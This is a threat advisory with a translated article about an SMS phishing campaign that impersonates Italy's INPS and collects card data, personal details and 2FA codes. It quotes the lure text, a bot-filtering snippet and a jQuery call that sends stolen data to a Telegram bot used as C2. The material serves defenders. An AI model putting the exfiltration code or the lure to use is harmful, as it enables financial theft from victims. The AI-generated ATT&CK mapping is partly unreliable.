Short Summary
A new smishing campaign targeting INPS is underway, aiming to steal victims’ credit card information and personal data such as name, surname, and tax code. The tactics, techniques, and procedures (TTPs) are well-orchestrated, notably utilizing a Telegram bot for Command and Control, a practice more commonly seen in malware operations.
Keypoints
- Target: INPS (Italian National Social Security Institute)
- Method: Smishing (SMS phishing)
- Objective: Steal credit card and personal information
- Use of a Telegram bot for Command and Control
- Victims receive SMS claiming verification is needed for a payment
- Fraudulent URL mimics the INPS portal
- Attempts to bypass two-factor authentication (2FA)
- Indicators of compromise (IoCs) shared via CERT-AGID
MITRE ATT&CK TTPs – created by AI
- Phishing – T1566
- Procedure: SMS phishing messages targeting victims to collect sensitive information.
- Command and Control – T1071
- Procedure: Use of a Telegram bot to send stolen data back to the attacker.
- Credential Dumping – T1003
- Procedure: Attempting to collect user credentials, including credit card information and 2FA codes.
Full Article Translation
22/08/2024
A new smishing campaign targeting INPS is underway, aiming to steal victims’ credit card information and personal data such as name, surname, and tax code. The TTPs are well-orchestrated, and the use of a Telegram bot for Command and Control is particularly notable, a practice more commonly used in malware operations.
According to the user fr0$t who reported the campaign, victims are receiving an SMS with the following text:
To proceed with the payment of € 930.00 to your account, verification of the beneficiary’s identity is required.
The short URL present in the message points to a fraudulent address that replicates the INPS portal.
Here, it checks if the user is using a proxy: if the proxy is active, the user will be identified as BOT and registered as such; otherwise, they will be considered a real user. In the latter case, a specific view is loaded based on the user’s language (langview).
setInterval(function() {
if ( $scope.info_User["country"]["proxy"] == true) {
proxy="BOT";
console.log(proxy)
}else{
proxy="REAL";
langview( $scope.info_User['lang']);
}
After an initial form requesting basic details, a second page is loaded for entering credit card information:
The phishing attempt also seeks to bypass two-factor authentication (2FA) by requesting the code received via SMS from the bank and subsequently the IBAN code of the victim.
The backend server is reachable at a different domain from the main one. Here, in addition to the data entered by the user, information regarding IP, browser, device, and operating system is also collected:
jQuery is used to send a POST request to the Telegram API to communicate the stolen data to the bot acting as C2:
$.ajax({
type: 'POST',
url: `https://api.telegram.org/bot${token}/sendMessage`,
data: {
chat_id: chatId,
text: message,
parse_mode: 'html',
},
success: function (res) {
setInterval(function() {
console.log('okkkk')
window.location.href = pathname+'card.php';
}, 3000);
},
error: function (error) {
console.error(error);
alert("error failed");
}
});
Indicators of Compromise
To make public the details for countering this campaign, the detected indicators are listed below, already disseminated through the IoC Feed of CERT-AGID to all accredited public organizations.
Link: Download IoC
Source: Original Post